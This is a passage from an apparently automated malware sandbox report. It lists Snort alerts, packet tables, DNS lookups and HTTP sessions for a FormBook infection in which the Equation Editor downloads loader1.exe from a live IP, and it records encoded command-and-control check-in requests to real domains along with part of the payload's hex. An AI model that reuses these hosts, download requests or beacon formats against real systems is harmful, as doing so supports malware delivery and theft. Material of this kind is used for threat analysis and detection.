                                                                                                                                                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . @ . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . = . . = . . . e . . . . . . . . 6 . . . . f . { . . ( . . . . . . Q % . J . % . \\ . H . + . ] . . . . . . . c ` g . . . g . .
                                                                                                                                                                                                    Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 40 98 b0 09 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    06/11/21-08:03:43.236814TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    06/11/21-08:05:16.324655TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22217.70.184.50
                                                                                                                                                                                                    06/11/21-08:05:16.324655TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22217.70.184.50
                                                                                                                                                                                                    06/11/21-08:05:16.324655TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22217.70.184.50
                                                                                                                                                                                                    06/11/21-08:05:26.602123TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2267.199.248.12
                                                                                                                                                                                                    06/11/21-08:05:26.602123TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2267.199.248.12
                                                                                                                                                                                                    06/11/21-08:05:26.602123TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2267.199.248.12

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.036910057 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.236002922 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.236166000 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.236814022 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.440939903 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441003084 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441044092 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441083908 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441095114 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441118002 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.441123962 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639425993 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639480114 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639518976 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639560938 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639590979 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639642000 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639683008 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639694929 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639719963 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639744997 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639751911 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639759064 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639765978 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.639772892 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.837985039 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838025093 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838051081 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838072062 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838093042 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838114977 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838133097 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838151932 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838150978 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838170052 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838171959 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838176012 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838193893 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838196039 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838215113 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838217974 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838236094 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838238001 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838253021 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838254929 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838273048 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838275909 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838294029 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838294983 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838311911 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838314056 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838332891 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838351965 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.843100071 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038254976 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038316011 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038357973 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038409948 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038455009 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038506031 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038568020 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038570881 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038629055 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038630962 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038690090 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038697958 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038746119 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038753033 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038786888 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038801908 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038851023 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038917065 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038959980 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038979053 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039000988 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039026022 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039042950 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039060116 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039077997 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039094925 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039110899 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039150953 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039167881 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039190054 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039208889 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039226055 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039242983 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039259911 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039272070 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039284945 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039297104 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039315939 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039436102 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039474964 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039480925 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039485931 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.043402910 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237402916 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237484932 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237519026 CEST8049167192.210.173.40192.168.2.22

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jun 11, 2021 08:04:58.375984907 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                    Jun 11, 2021 08:04:58.442483902 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:05:08.471185923 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                    Jun 11, 2021 08:05:08.835160017 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.180650949 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.260540962 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:05:21.409224033 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                    Jun 11, 2021 08:05:21.484855890 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.482148886 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.549051046 CEST53495488.8.8.8192.168.2.22

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Jun 11, 2021 08:04:58.375984907 CEST192.168.2.228.8.8.80xccffStandard query (0)www.reufhroir.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:08.471185923 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.pholbhf.icuA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.180650949 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.spinecompanion.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:21.409224033 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.dr-farshidtajik.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.482148886 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.doodstore.netA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Jun 11, 2021 08:04:58.442483902 CEST8.8.8.8192.168.2.220xccffName error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:08.835160017 CEST8.8.8.8192.168.2.220x2e78Name error (3)www.pholbhf.icunonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.260540962 CEST8.8.8.8192.168.2.220x2f03No error (0)www.spinecompanion.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.260540962 CEST8.8.8.8192.168.2.220x2f03No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:21.484855890 CEST8.8.8.8192.168.2.220x3c4eServer failure (2)www.dr-farshidtajik.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.doodstore.netdoodstore.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)doodstore.net67.199.248.12A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)doodstore.net67.199.248.13A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • 192.210.173.40
                                                                                                                                                                                                    • www.spinecompanion.com
                                                                                                                                                                                                    • www.doodstore.net

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.2249167192.210.173.4080C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.236814022 CEST0OUTGET /files/loader1.exe HTTP/1.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                    Host: 192.210.173.40
                                                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.210.173.4080192.168.2.2249167C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.440939903 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 11 Jun 2021 06:03:41 GMT
                                                                                                                                                                                                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                                                                                                                                                    Last-Modified: Thu, 10 Jun 2021 15:14:59 GMT
                                                                                                                                                                                                    ETag: "36f99-5c46adac1699a"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 225177
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.2249168217.70.184.5080C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.324655056 CEST238OUTGET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1
                                                                                                                                                                                                    Host: www.spinecompanion.com
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Jun 11, 2021 08:05:16.388231039 CEST239INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 11 Jun 2021 06:05:16 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Vary: Accept-Language
                                                                                                                                                                                                    Data Raw: 39 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2d 30 64 64 65 30 65 62 32 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 50 61 67 65 2d 72 6f 6f 74 5f 6d 65 76 32 63 20 22 3e 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 72 6f 6f 74 5f 31 41 71 45 5a 20 50 61 72 6b 69 6e 67 2d 72 6f 6f 74 5f 56 73 4c 6a 59 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 77 72 61 70 70 65 72 5f 33 79 71 37 5a 22 3e 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 63 6f 6e 74 65 6e 74 5f 32 79 57 4c 77 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 69 74 6c 65 5f 6d 66 30 72 70 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 65 78 74 5f 31 66 6d 63 56 20 50 61 72 6b 69 6e 67 2d 74 65 78 74 5f 46 47 44 6a 4d 22 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 64 61 74 61 20 66 6f 72 20 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 73 65 65 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 70 6f 73 69 74 69 6f 6e 62 6f 78 5f 5f 51 55 38 33 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 6f 75 74 65 72 62 6f 78 5f 33 35 53 63 39 22 3e 3c 70 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 62 6f 72 64 65 72 62 6f 78 5f 32 55 79 7a 66 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 64 6f 6d 61 69 6e 2f 73 